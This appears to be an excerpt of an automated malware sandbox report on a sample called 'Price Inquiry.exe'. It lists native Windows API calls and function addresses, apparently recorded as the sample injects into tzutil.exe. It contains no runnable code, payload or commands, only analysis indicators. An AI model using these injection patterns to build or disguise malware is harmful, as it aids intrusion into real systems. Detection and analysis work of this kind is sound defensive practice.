Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712AB0 NtWaitForSingleObject,	4_2_01712AB0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712D30 NtUnmapViewOfSection,	4_2_01712D30
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712D10 NtMapViewOfSection,	4_2_01712D10
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712D00 NtSetInformationFile,	4_2_01712D00
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712DD0 NtDelayExecution,	4_2_01712DD0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712DB0 NtEnumerateKey,	4_2_01712DB0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712C60 NtCreateKey,	4_2_01712C60
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712C00 NtQueryInformationProcess,	4_2_01712C00
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712CF0 NtOpenProcess,	4_2_01712CF0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712CC0 NtQueryVirtualMemory,	4_2_01712CC0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712CA0 NtQueryInformationToken,	4_2_01712CA0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712F60 NtCreateProcessEx,	4_2_01712F60
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712F30 NtCreateSection,	4_2_01712F30
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712FE0 NtCreateFile,	4_2_01712FE0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712FB0 NtResumeThread,	4_2_01712FB0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712FA0 NtQuerySection,	4_2_01712FA0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712F90 NtProtectVirtualMemory,	4_2_01712F90
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712E30 NtWriteVirtualMemory,	4_2_01712E30
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712EE0 NtQueueApcThread,	4_2_01712EE0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712EA0 NtAdjustPrivilegesToken,	4_2_01712EA0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712E80 NtReadVirtualMemory,	4_2_01712E80
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01713010 NtOpenDirectoryObject,	4_2_01713010
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01713090 NtSetValueKey,	4_2_01713090
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017139B0 NtGetContextThread,	4_2_017139B0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01713D70 NtOpenThread,	4_2_01713D70
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01713D10 NtOpenProcessToken,	4_2_01713D10
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03144340 NtSetContextThread,LdrInitializeThunk,	9_2_03144340
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03144650 NtSuspendThread,LdrInitializeThunk,	9_2_03144650
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142B60 NtClose,LdrInitializeThunk,	9_2_03142B60
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142BA0 NtEnumerateValueKey,LdrInitializeThunk,	9_2_03142BA0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_03142BF0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142BE0 NtQueryValueKey,LdrInitializeThunk,	9_2_03142BE0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142AD0 NtReadFile,LdrInitializeThunk,	9_2_03142AD0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142AF0 NtWriteFile,LdrInitializeThunk,	9_2_03142AF0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142F30 NtCreateSection,LdrInitializeThunk,	9_2_03142F30
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142FB0 NtResumeThread,LdrInitializeThunk,	9_2_03142FB0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142FE0 NtCreateFile,LdrInitializeThunk,	9_2_03142FE0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142E80 NtReadVirtualMemory,LdrInitializeThunk,	9_2_03142E80
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142EE0 NtQueueApcThread,LdrInitializeThunk,	9_2_03142EE0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142D10 NtMapViewOfSection,LdrInitializeThunk,	9_2_03142D10
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142D30 NtUnmapViewOfSection,LdrInitializeThunk,	9_2_03142D30
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142DD0 NtDelayExecution,LdrInitializeThunk,	9_2_03142DD0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_03142DF0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142C70 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_03142C70
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142C60 NtCreateKey,LdrInitializeThunk,	9_2_03142C60
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142CA0 NtQueryInformationToken,LdrInitializeThunk,	9_2_03142CA0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031435C0 NtCreateMutant,LdrInitializeThunk,	9_2_031435C0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031439B0 NtGetContextThread,LdrInitializeThunk,	9_2_031439B0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142B80 NtQueryInformationFile,	9_2_03142B80
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142AB0 NtWaitForSingleObject,	9_2_03142AB0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142F60 NtCreateProcessEx,	9_2_03142F60
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142F90 NtProtectVirtualMemory,	9_2_03142F90
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142FA0 NtQuerySection,	9_2_03142FA0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142E30 NtWriteVirtualMemory,	9_2_03142E30
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142EA0 NtAdjustPrivilegesToken,	9_2_03142EA0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142D00 NtSetInformationFile,	9_2_03142D00
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142DB0 NtEnumerateKey,	9_2_03142DB0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142C00 NtQueryInformationProcess,	9_2_03142C00
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142CC0 NtQueryVirtualMemory,	9_2_03142CC0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03142CF0 NtOpenProcess,	9_2_03142CF0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03143010 NtOpenDirectoryObject,	9_2_03143010
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03143090 NtSetValueKey,	9_2_03143090
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03143D10 NtOpenProcessToken,	9_2_03143D10
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03143D70 NtOpenThread,	9_2_03143D70
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_005B90D0 NtCreateFile,	9_2_005B90D0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_005B9240 NtReadFile,	9_2_005B9240
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_005B9330 NtDeleteFile,	9_2_005B9330
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_005B93D0 NtClose,	9_2_005B93D0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_005B9530 NtAllocateVirtualMemory,	9_2_005B9530

Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 0_2_0111E1F4	0_2_0111E1F4
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 0_2_076B6BE8	0_2_076B6BE8
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 0_2_076B10A0	0_2_076B10A0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 0_2_076B10B0	0_2_076B10B0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 0_2_076B0C68	0_2_076B0C68
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 0_2_076B0C78	0_2_076B0C78
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 0_2_076B2CE8	0_2_076B2CE8
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 0_2_076B0840	0_2_076B0840
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 0_2_076B0821	0_2_076B0821
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 0_2_076B28B0	0_2_076B28B0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 0_2_08E87B30	0_2_08E87B30
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 0_2_08E87B23	0_2_08E87B23
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 0_2_08E8D5E9	0_2_08E8D5E9
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_00418513	4_2_00418513
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0040E02E	4_2_0040E02E
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0040E033	4_2_0040E033
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_00402220	4_2_00402220
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0042EA93	4_2_0042EA93
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_004024C6	4_2_004024C6
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_004024D0	4_2_004024D0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0040FD8A	4_2_0040FD8A
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0040FD93	4_2_0040FD93
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_00402E50	4_2_00402E50
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_004166EE	4_2_004166EE
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_004166F3	4_2_004166F3
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0040FFB3	4_2_0040FFB3
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01768158	4_2_01768158
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D0100	4_2_016D0100
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177A118	4_2_0177A118
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017981CC	4_2_017981CC
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017A01AA	4_2_017A01AA
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01772000	4_2_01772000
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0179A352	4_2_0179A352
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017A03E6	4_2_017A03E6
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016EE3F0	4_2_016EE3F0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01780274	4_2_01780274
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017602C0	4_2_017602C0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0535	4_2_016E0535
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017A0591	4_2_017A0591
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01792446	4_2_01792446
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01784420	4_2_01784420
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0178E4F6	4_2_0178E4F6
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0770	4_2_016E0770
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01704750	4_2_01704750
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DC7C0	4_2_016DC7C0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FC6E0	4_2_016FC6E0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F6962	4_2_016F6962
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E29A0	4_2_016E29A0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017AA9A6	4_2_017AA9A6
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E2840	4_2_016E2840
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016EA840	4_2_016EA840
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170E8F0	4_2_0170E8F0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016C68B8	4_2_016C68B8
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0179AB40	4_2_0179AB40
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01796BD7	4_2_01796BD7
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DEA80	4_2_016DEA80
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177CD1F	4_2_0177CD1F
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016EAD00	4_2_016EAD00
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DADE0	4_2_016DADE0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F8DBF	4_2_016F8DBF
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0C00	4_2_016E0C00
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D0CF2	4_2_016D0CF2
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01780CB5	4_2_01780CB5
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01754F40	4_2_01754F40
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01700F30	4_2_01700F30
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01782F30	4_2_01782F30
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01722F28	4_2_01722F28
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016ECFE0	4_2_016ECFE0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D2FC8	4_2_016D2FC8
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175EFA0	4_2_0175EFA0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0E59	4_2_016E0E59
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0179EE26	4_2_0179EE26
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0179EEDB	4_2_0179EEDB
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0179CE93	4_2_0179CE93
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F2E90	4_2_016F2E90
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017AB16B	4_2_017AB16B
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0171516C	4_2_0171516C
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016CF172	4_2_016CF172
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016EB1B0	4_2_016EB1B0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017970E9	4_2_017970E9
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0179F0E0	4_2_0179F0E0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E70C0	4_2_016E70C0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0178F0CC	4_2_0178F0CC
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016CD34C	4_2_016CD34C
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0179132D	4_2_0179132D
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0172739A	4_2_0172739A
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017812ED	4_2_017812ED
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FB2C0	4_2_016FB2C0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E52A0	4_2_016E52A0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01797571	4_2_01797571
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177D5B0	4_2_0177D5B0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D1460	4_2_016D1460
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0179F43F	4_2_0179F43F
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0179F7B0	4_2_0179F7B0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017916CC	4_2_017916CC
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E9950	4_2_016E9950
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FB950	4_2_016FB950
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01775910	4_2_01775910
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174D800	4_2_0174D800
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E38E0	4_2_016E38E0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0179FB76	4_2_0179FB76
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01755BF0	4_2_01755BF0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0171DBF9	4_2_0171DBF9
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FFB80	4_2_016FFB80
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01753A6C	4_2_01753A6C
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0179FA49	4_2_0179FA49
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01797A46	4_2_01797A46
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0178DAC6	4_2_0178DAC6
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01725AA0	4_2_01725AA0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177DAAC	4_2_0177DAAC
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01781AA3	4_2_01781AA3
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01797D73	4_2_01797D73
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01791D5A	4_2_01791D5A
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E3D40	4_2_016E3D40
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FFDC0	4_2_016FFDC0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01759C32	4_2_01759C32
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0179FCF2	4_2_0179FCF2
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0179FF09	4_2_0179FF09
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016A3FD2	4_2_016A3FD2
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016A3FD5	4_2_016A3FD5
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0179FFB1	4_2_0179FFB1
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E1F92	4_2_016E1F92
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E9EB0	4_2_016E9EB0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031CA352	9_2_031CA352
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0311E3F0	9_2_0311E3F0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031D03E6	9_2_031D03E6
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031B0274	9_2_031B0274
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031902C0	9_2_031902C0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031AA118	9_2_031AA118
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03100100	9_2_03100100
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03198158	9_2_03198158
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031D01AA	9_2_031D01AA
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031C41A2	9_2_031C41A2
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031C81CC	9_2_031C81CC
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031A2000	9_2_031A2000
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03134750	9_2_03134750
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03110770	9_2_03110770
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0310C7C0	9_2_0310C7C0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0312C6E0	9_2_0312C6E0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03110535	9_2_03110535
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031D0591	9_2_031D0591
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031B4420	9_2_031B4420
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031C2446	9_2_031C2446
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031BE4F6	9_2_031BE4F6
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031CAB40	9_2_031CAB40
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031C6BD7	9_2_031C6BD7
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0310EA80	9_2_0310EA80
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03126962	9_2_03126962
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031129A0	9_2_031129A0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031DA9A6	9_2_031DA9A6
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0311A840	9_2_0311A840
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03112840	9_2_03112840
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_030F68B8	9_2_030F68B8
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0313E8F0	9_2_0313E8F0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03130F30	9_2_03130F30
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031B2F30	9_2_031B2F30
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03152F28	9_2_03152F28
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03184F40	9_2_03184F40
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0318EFA0	9_2_0318EFA0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03102FC8	9_2_03102FC8
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0311CFE0	9_2_0311CFE0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031CEE26	9_2_031CEE26
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03110E59	9_2_03110E59
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03122E90	9_2_03122E90
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031CCE93	9_2_031CCE93
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031CEEDB	9_2_031CEEDB
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031ACD1F	9_2_031ACD1F
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0311AD00	9_2_0311AD00
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03128DBF	9_2_03128DBF
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0310ADE0	9_2_0310ADE0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03110C00	9_2_03110C00
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031B0CB5	9_2_031B0CB5
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03100CF2	9_2_03100CF2
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031C132D	9_2_031C132D
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_030FD34C	9_2_030FD34C
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0315739A	9_2_0315739A
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031152A0	9_2_031152A0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0312B2C0	9_2_0312B2C0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031B12ED	9_2_031B12ED
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031DB16B	9_2_031DB16B
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0314516C	9_2_0314516C
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_030FF172	9_2_030FF172
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0311B1B0	9_2_0311B1B0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031170C0	9_2_031170C0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031BF0CC	9_2_031BF0CC
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031C70E9	9_2_031C70E9
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031CF0E0	9_2_031CF0E0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031CF7B0	9_2_031CF7B0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031C16CC	9_2_031C16CC
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031C7571	9_2_031C7571
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031AD5B0	9_2_031AD5B0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031CF43F	9_2_031CF43F
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03101460	9_2_03101460
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031CFB76	9_2_031CFB76
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0312FB80	9_2_0312FB80
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03185BF0	9_2_03185BF0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0314DBF9	9_2_0314DBF9
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031CFA49	9_2_031CFA49
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031C7A46	9_2_031C7A46
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03183A6C	9_2_03183A6C
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03155AA0	9_2_03155AA0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031ADAAC	9_2_031ADAAC
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031B1AA3	9_2_031B1AA3
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031BDAC6	9_2_031BDAC6
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031A5910	9_2_031A5910
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03119950	9_2_03119950
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0312B950	9_2_0312B950
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0317D800	9_2_0317D800
